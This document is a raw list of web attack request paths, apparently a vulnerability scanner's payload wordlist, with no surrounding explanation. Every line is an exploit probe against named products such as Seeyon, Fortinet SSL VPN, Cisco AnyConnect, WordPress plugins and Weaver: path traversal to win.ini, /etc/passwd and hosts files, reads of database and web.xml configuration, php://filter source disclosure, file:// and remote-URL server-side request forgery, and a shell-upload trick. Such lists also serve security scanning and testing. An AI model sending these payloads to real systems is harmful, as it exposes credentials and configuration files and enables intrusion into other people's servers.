/index/Api/post_curl
/include/thumb.php?dir=http\..\admin\login\login_check.php
/api/geojson?url=file://c://windows/win.ini
/common/download/resource?resource=/profile/../../../../Windows/win.ini
/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini
/download.do?file=../../../../config.text
/seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties
/public/index.php/material/Material/_download_imgage?media_id=1&picUrl=./../config/database.php
/backup/auto.php?password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php
/rewrite?x=/../../../../../../../etc/hosts
/?page=php://filter/zlib.deflate/convert.base64-encode/resource=/e\t\c/pa\s\swd
/wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php
/NCFindWeb?service=IPreAlertConfigService&filename=WEB-INF/web.xml
/prod-api/common/download/resource?name=/profile/../../../../../windows/win.ini
/hrm/hrm_e9/orgChart/js/jquery/plugins/jqueryFileTree/connectors/jqueryFileTree.jsp?dir=/page/resource/userfile/../../
/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=../../../../../../../&resource-type=../../../../../../&name=+CSCOE+/../../../../../../../../../+CSCOE+/portal_inc.lua
/onecluster.jsp?cluster=dasdsad&timestamp=/../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/hostname&isTMP=true
/?_JD_ID=9a3da9a595e536c2&filename=../../../../../../WEB-INF/web.xml
/?_JD_ID=4942cd09418faf73&filename=..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/windows/win.ini
/?_JD_ID=1e025e97bc1e9e7f&filename=rar://shell.jpg#payload.php
/systemLog/downFIle.php?_JD_ID=ea8d2bc5ff2e820b&fileName=../../../../../../../../windows/system32/drivers/etc/hosts
/systemLog/downFIle.php?_JD_ID=5a59d16401938478&fileName=../../../../../../../../windows/system32/drivers/etc/hosts
/e-mobile/App/Init.php?weiApi=1&sessionkey=ee651bec023d0db0c233fcb562ec7673_admin&m=12344554_../../general/login/view/js/common.js....................................................................................................................................................................................................................................
/i3geo/exemplos/codemirror.php?&page=../../../../../../../../../../../../../../../../../windows/win.ini
/wp-json/lp/v1/courses/archive-course?template_pagination_path=php://filter/convert.base64-encode/resource=wp-content/plugins/learnpress/inc/rest-api/v1/frontend/class-lp-rest-courses-controller.php
/?file=http://0177.0.0.1/etc/passwd
/wp-content/plugins/usc-e-shop/functions/progress-check.php?progressfile=../../../../../../../../../../../../../windows/win.ini
/events?a=./..letc/passwd
/index.php?q=file:///C:/Windows/win.ini
/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///c://windows/win.ini&fileExt=txt
/photo/combine.php?type=javascript&g=core-r7rules/../../../uwavvkrf.php.
/include/js/extjs//examples/feed-viewer/feed-proxy.php?feed=http://bxss.me/t/fit.txt
/libs/extjs//examples/feed-viewer/feed-proxy.php?feed=http://bxss.me/t/fit.txt
/lib/extjs//examples/feed-viewer/feed-proxy.php?feed=http://bxss.me/t/fit.txt
/min/index.php?f=/min/config.php\x0.css
/minify/min/index.php?f=/minify/min/config.php\x0.css
/libs/js/extjs//examples/feed-viewer/feed-proxy.php?feed=http://bxss.me/t/fit.txt
/extjs//examples/feed-viewer/feed-proxy.php?feed=http://bxss.me/t/fit.txt
/lib/js/extjs//examples/feed-viewer/feed-proxy.php?feed=http://bxss.me/t/fit.txt
/js/extjs//examples/feed-viewer/feed-proxy.php?feed=http://bxss.me/t/fit.txt
/contrib/extjs//examples/feed-viewer/feed-proxy.php?feed=http://bxss.me/t/fit.txt
/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=file://C:\Windows\win.ini
/render?url=http://bxss.me/t/fit.txt
/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:////windows/win.ini